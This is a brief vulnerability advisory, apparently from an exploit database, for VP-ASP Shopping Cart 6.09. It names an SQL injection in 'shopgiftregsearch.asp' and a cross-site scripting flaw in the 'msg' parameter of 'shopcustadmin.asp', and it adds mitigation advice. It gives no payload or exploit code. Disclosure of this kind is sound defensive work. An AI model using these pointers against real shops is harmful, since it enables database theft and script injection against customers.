vendor: VP-ASP Shopping Cart
by: ajann
CVSS: 7.5 (HIGH)
Remote Multiple Vulnerabilities
CWE: 89
Product Name: VP-ASP Shopping Cart
Affected Version From: 06.09
Affected Version To: 06.09
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
VP-ASP Shopping Cart 6.09 is vulnerable to SQL Injection and Cross-Site Scripting (XSS) attacks. An attacker can exploit the SQL Injection vulnerability by sending a specially crafted request to the 'shopgiftregsearch.asp' page, which can lead to unauthorized access to the backend database. The XSS vulnerability can be exploited by injecting malicious code into the 'msg' parameter of the 'shopcustadmin.asp' page; the parameter is not properly sanitized before being displayed to users.
Mitigation:
To mitigate these vulnerabilities, it is recommended to sanitize user input before using it in SQL queries and to implement proper input validation and output encoding to prevent XSS attacks.